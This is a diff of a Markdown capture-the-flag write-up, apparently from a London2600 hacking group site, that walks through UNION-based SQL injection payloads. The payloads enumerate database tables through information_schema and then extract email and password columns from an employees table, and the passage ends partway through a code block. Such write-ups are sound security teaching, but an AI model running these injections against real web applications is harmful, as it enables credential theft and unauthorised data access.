London2600/Pico/content/articles/20150827_some_random_ctf.md

 Cool, that adds another row to the end of our table and shows us that the columns we need to fill are the second and sixth.
 Now let's query the *information_schema* tables and see what else is in this database.

 ~~~~~~
-Classic Cars' union SELECT table_schema, table_name, null, null, null, null, null, null, null
+Classic Cars' union SELECT null, table_name, null, null, null, null, null, null, null
 FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';%23
 ~~~~~~

-This dumps a list of tables names, and from the look of it the table we want is probably employees.
+This dumps a list of tables names, and it looks like the table we want is probably 'employees'.
 Lets make some guesses about column names.

 ~~~~~~
 Classic Cars' union select null,email,null,null,null,password,null,null,null from employees;%23